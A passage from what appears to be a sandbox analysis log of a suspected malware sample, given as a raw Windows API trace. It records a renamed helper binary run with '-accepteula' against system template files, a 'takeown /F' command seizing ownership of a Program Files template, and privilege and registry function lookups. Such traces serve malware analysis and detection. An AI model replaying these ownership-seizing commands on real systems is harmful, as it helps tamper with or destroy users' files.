lpReturnSize=0x0 | out: lpAttributeList=0x1ef1f4, lpPreviousValue=0x0) returned 1 [0237.466] GetStartupInfoW (in: lpStartupInfo=0x1ef1b0 | out: lpStartupInfo=0x1ef1b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0237.467] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0237.467] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1ef250*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef29c | out: lpCommandLine="tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner", lpProcessInformation=0x1ef29c*(hProcess=0x78, hThread=0x74, dwProcessId=0x748, dwThreadId=0x758)) returned 1 [0237.789] CloseHandle (hObject=0x74) returned 1 [0237.789] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0237.789] GetProcessHeap () returned 0x610000 [0237.789] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622d70 | out: hHeap=0x610000) returned 1 [0237.789] GetEnvironmentStringsW () returned 0x622c98* [0237.789] GetProcessHeap () returned 0x610000 [0237.789] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb86) returned 0x62af20 [0237.789] FreeEnvironmentStringsW (penv=0x622c98) returned 1 [0237.789] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0240.193] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x1ef190 | out: lpExitCode=0x1ef190*=0x1) returned 1 [0240.193] CloseHandle (hObject=0x78) returned 1 [0240.193] _vsnwprintf (in: _Buffer=0x1ef2d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef19c | out: _Buffer="00000001") returned 8 [0240.194] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0240.194] GetProcessHeap () returned 0x610000 [0240.194] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62af20 | out: hHeap=0x610000) returned 1 [0240.194] GetEnvironmentStringsW () returned 0x622c98* [0240.194] GetProcessHeap () returned 0x610000 [0240.194] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb86) returned 0x62af20 [0240.194] FreeEnvironmentStringsW (penv=0x622c98) returned 1 [0240.194] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0240.194] GetProcessHeap () returned 0x610000 [0240.194] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62af20 | out: hHeap=0x610000) returned 1 [0240.194] GetEnvironmentStringsW () returned 0x622c98* [0240.194] GetProcessHeap () returned 0x610000 [0240.194] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb86) returned 0x62af20 [0240.194] FreeEnvironmentStringsW (penv=0x622c98) returned 1 [0240.194] GetProcessHeap () returned 0x610000 [0240.194] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6200d0 | out: hHeap=0x610000) returned 1 [0240.194] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef1f4 | out: lpAttributeList=0x1ef1f4) [0240.194] _get_osfhandle (_FileHandle=1) returned 0x80 [0240.194] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0240.194] _get_osfhandle (_FileHandle=1) returned 0x80 [0240.194] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0240.194] _get_osfhandle (_FileHandle=0) returned 0x3 [0240.194] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0240.195] SetConsoleInputExeNameW () returned 0x1 [0240.195] GetConsoleOutputCP () returned 0x1b5 [0240.195] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0240.195] SetThreadUILanguage (LangId=0x0) returned 0x409 [0240.195] exit (_Code=1) Process: id = "254" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x189f5000" os_pid = "0x598" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "223" os_parent_pid = "0x540" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 864 os_tid = 0xb1c Thread: id = 870 os_tid = 0x6a0 Process: id = "255" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x28477000" os_pid = "0x320" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "251" os_parent_pid = "0xaf0" cmd_line = "tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 862 os_tid = 0xa18 [0237.849] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0237.849] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0237.849] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0237.849] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0237.849] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0237.849] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0237.850] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0237.851] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0237.851] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0237.851] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0237.851] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0237.946] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0237.946] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0237.946] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0237.946] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0237.946] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0237.947] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0237.947] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0237.947] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0237.947] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0237.947] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0237.947] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0237.947] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0237.947] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0237.948] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0237.948] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0237.948] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0237.948] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0237.948] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0237.948] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0237.948] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0237.948] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0237.948] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0237.949] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0237.949] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0237.949] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0237.949] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0237.949] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0237.949] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0237.949] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0237.950] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0237.950] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0237.950] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0237.950] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0237.950] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0237.950] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0237.950] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0237.950] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0237.950] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0237.951] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0237.951] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0237.951] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0237.951] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0237.951] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0237.951] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0237.951] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0237.951] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0237.951] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0237.952] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0237.952] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0237.952] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0237.952] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0237.952] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0237.952] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0237.952] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0237.953] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0237.953] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0237.953] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0237.953] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0237.953] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0237.953] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0237.953] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0237.953] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0237.954] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0237.954] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0237.954] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0237.954] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0237.954] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0237.954] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0237.955] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0237.955] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0237.955] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0237.955] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0237.955] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0237.955] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0237.956] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0237.956] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0237.956] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0237.956] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0237.956] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0237.956] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0237.956] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0237.956] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0237.956] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0237.957] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0237.957] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0237.957] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0237.957] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0237.957] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0237.957] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0237.958] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0237.958] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0237.958] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0237.958] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0237.958] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0237.958] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0237.958] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0237.959] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0237.959] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0237.959] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0237.959] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0237.959] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0237.959] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0237.960] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0237.960] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0237.960] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0237.960] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0237.961] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0237.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x43bea620, dwHighDateTime=0x1d68287)) [0237.961] GetCurrentThreadId () returned 0xa18 [0237.961] GetCurrentProcessId () returned 0x320 [0237.961] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=35830044746) returned 1 [0237.962] GetProcessHeap () returned 0x630000 [0237.962] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0237.962] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0237.962] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0237.962] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0237.962] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0237.963] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0237.963] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0237.963] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0237.963] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0237.963] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0237.963] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0237.963] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0237.963] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0237.964] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0237.964] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0237.964] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0237.964] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0237.964] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0237.964] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0237.964] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0237.964] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0237.964] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0237.965] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0237.965] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0237.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0237.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0237.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0237.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0237.965] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0237.965] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0237.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0237.965] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0237.966] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0237.966] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3bc) returned 0x6460c8 [0237.967] GetCurrentThreadId () returned 0xa18 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x646490 [0237.967] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x800) returned 0x6464b0 [0237.968] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x15cb3561, hStdError=0x0)) [0237.968] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0237.968] GetFileType (hFile=0x3) returned 0x2 [0237.968] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0237.968] GetFileType (hFile=0x80) returned 0x3 [0237.969] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0237.969] GetFileType (hFile=0xb) returned 0x2 [0237.969] GetCommandLineW () returned="tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner" [0237.969] GetEnvironmentStringsW () returned 0x646cb8* [0237.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb84) returned 0x647848 [0237.970] FreeEnvironmentStringsW (penv=0x646cb8) returned 1 [0237.970] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0237.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x78) returned 0x63f8e8 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xa0) returned 0x646cb8 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3e) returned 0x6483f0 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x6c) returned 0x646d60 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x6e) returned 0x646dd8 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x78) returned 0x63f968 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x62) returned 0x646e50 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x646ec0 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0x646ef8 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x28) returned 0x646f48 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x28) returned 0x646f78 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1a) returned 0x645a98 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x4a) returned 0x646fa8 [0237.971] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x72) returned 0x63f9e8 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x647000 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x647038 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1c) returned 0x645ac0 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xd2) returned 0x647070 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x7c) returned 0x647150 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x36) returned 0x6471d8 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3a) returned 0x648438 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x90) returned 0x647218 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x6472b0 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x6472e0 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x36) returned 0x647318 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0x647358 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x52) returned 0x6473a8 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0x648480 [0237.972] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x18) returned 0x647408 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x82) returned 0x647428 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x6474b8 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1e) returned 0x645ae8 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2c) returned 0x6474f0 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x54) returned 0x647528 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, 